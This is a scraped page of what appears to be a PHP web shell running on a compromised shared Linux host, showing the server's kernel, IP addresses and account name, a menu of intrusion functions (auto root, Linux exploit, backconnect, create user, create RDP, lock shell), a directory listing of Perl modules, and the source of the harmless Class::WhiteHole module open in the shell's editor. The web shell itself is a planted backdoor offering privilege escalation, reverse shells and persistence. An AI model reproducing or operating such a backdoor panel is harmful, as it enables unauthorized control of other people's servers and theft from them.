Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
Class /
[ HOME SHELL ]
Name
Size
Permission
Action
Accessor
[ DIR ]
drwxr-xr-x
C3
[ DIR ]
drwxr-xr-x
DBI
[ DIR ]
drwxr-xr-x
Data
[ DIR ]
drwxr-xr-x
Inspector
[ DIR ]
drwxr-xr-x
Load
[ DIR ]
drwxr-xr-x
Method
[ DIR ]
drwxr-xr-x
Virtually
[ DIR ]
drwxr-xr-x
Accessor.pm
20.15
KB
-rw-r--r--
C3.pm
18.06
KB
-rw-r--r--
Container.pm
28.07
KB
-rw-r--r--
DBI.pm
103.5
KB
-rw-r--r--
ErrorHandler.pm
2.38
KB
-rw-r--r--
ISA.pm
6.86
KB
-rw-r--r--
Inner.pm
4.46
KB
-rw-r--r--
Inspector.pm
18.19
KB
-rw-r--r--
Load.pm
11.27
KB
-rw-r--r--
Singleton.pm
12.36
KB
-rw-r--r--
Trigger.pm
10.46
KB
-rw-r--r--
Virtual.pm
5.51
KB
-rw-r--r--
WhiteHole.pm
1.93
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : WhiteHole.pm
# $Id: WhiteHole.pm,v 1.4 2001/02/07 11:42:37 schwern Exp $ package Class::WhiteHole; require 5; use strict; use vars qw(@ISA $VERSION $ErrorMsg); $VERSION = '0.04'; @ISA = (); # From 5.6.0's perldiag. $ErrorMsg = qq{Can\'t locate object method "%s" via package "%s" }. qq{at %s line %d.\n}; =pod =head1 NAME Class::WhiteHole - base class to treat unhandled method calls as errors =head1 SYNOPSIS package Bar; # DBI inherits from DynaLoader which inherits from AutoLoader # Bar wants to avoid this accidental inheritance of AutoLoader. use base qw(Class::WhiteHole DBI); =head1 DESCRIPTION Its possible to accidentally inherit an AUTOLOAD method. Often this will happen if a class somewhere in the chain uses AutoLoader or defines one of their own. This can lead to confusing error messages when method lookups fail. Sometimes you want to avoid this accidental inheritance. In that case, inherit from Class::WhiteHole. All unhandled methods will produce normal Perl error messages. =head1 BUGS & CAVEATS Be sure to have Class::WhiteHole before the class from which you're inheriting AUTOLOAD in the ISA. Usually you'll want Class::WhiteHole to come first. If your class inherits autoloaded routines this class may cause them to stop working. Choose wisely before using. White holes are only a hypothesis and may not really exist. =head1 COPYRIGHT Copyright 2000 Michael G Schwern <schwern@pobox.com> all rights reserved. This program is free software; you can redistribute it and/or modify it under the same terms as Perl itself. =head1 AUTHOR Michael G Schwern <schwern@pobox.com> =head1 SEE ALSO L<Class::BlackHole> =cut sub AUTOLOAD { my($proto) = shift; my($class) = ref $proto || $proto; my($meth) = $Class::WhiteHole::AUTOLOAD =~ m/::([^:]+)$/; return if $meth eq 'DESTROY'; my($callpack, $callfile, $callline) = caller; die sprintf $ErrorMsg, $meth, $class, $callfile, $callline; } 1;
Close